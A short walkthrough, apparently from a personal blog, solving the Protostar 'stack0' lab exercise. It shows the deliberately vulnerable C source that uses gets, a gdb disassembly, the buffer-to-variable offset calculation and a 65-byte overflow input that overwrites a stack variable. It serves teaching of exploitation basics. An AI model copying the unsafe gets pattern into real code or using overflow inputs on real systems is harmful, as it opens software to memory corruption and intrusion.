protostar - stack 0

1 minute read

Lets check the file type of our binary using file command,

$ file stack0
stack0: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.18, not stripped

This binary is a not stripped binary which runs in 32 bit

Lets try running our binary,

$ ./stack0
monish
Try again?

Lets view the source code for proper understanding,

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];

  modified = 0;
  gets(buffer);

  if(modified != 0) {
      printf("you have changed the 'modified' variable\n");
  } else {
      printf("Try again?\n");
  }
}

So we need to overwrite the modified variable to pass the program

Lets use our debugger to analyse this program,

Disassembling main(),

(gdb) disas main
Dump of assembler code for function main:
0x080483f4 <main+0>:	push   ebp
0x080483f5 <main+1>:	mov    ebp,esp
0x080483f7 <main+3>:	and    esp,0xfffffff0
0x080483fa <main+6>:	sub    esp,0x60
0x080483fd <main+9>:	mov    DWORD PTR [esp+0x5c],0x0
0x08048405 <main+17>:	lea    eax,[esp+0x1c]
0x08048409 <main+21>:	mov    DWORD PTR [esp],eax
0x0804840c <main+24>:	call   0x804830c <gets@plt>
0x08048411 <main+29>:	mov    eax,DWORD PTR [esp+0x5c]
0x08048415 <main+33>:	test   eax,eax
0x08048417 <main+35>:	je     0x8048427 <main+51>
0x08048419 <main+37>:	mov    DWORD PTR [esp],0x8048500
0x08048420 <main+44>:	call   0x804832c <puts@plt>
0x08048425 <main+49>:	jmp    0x8048433 <main+63>
0x08048427 <main+51>:	mov    DWORD PTR [esp],0x8048529
0x0804842e <main+58>:	call   0x804832c <puts@plt>
0x08048433 <main+63>:	leave
0x08048434 <main+64>:	ret

Here modified is set to 0

0x080483fd <main+9>:	mov    DWORD PTR [esp+0x5c],0x0

modified is at $esp+0x5c

Now our buffer space is allocated by,

0x08048405 <main+17>:	lea    eax,[esp+0x1c]

Starting place of buffer is at $esp+0x1c

To overwrite modified we need to find the space between them

>>> print(0x5c-0x1c)
64

So we need to pass 64 bytes + 1 byte to overwrite the modified

Lets try our exploit,

$ python -c "print('A'*65)" | ./stack0
you have changed the 'modified' variable

Done! we have completed “stack0”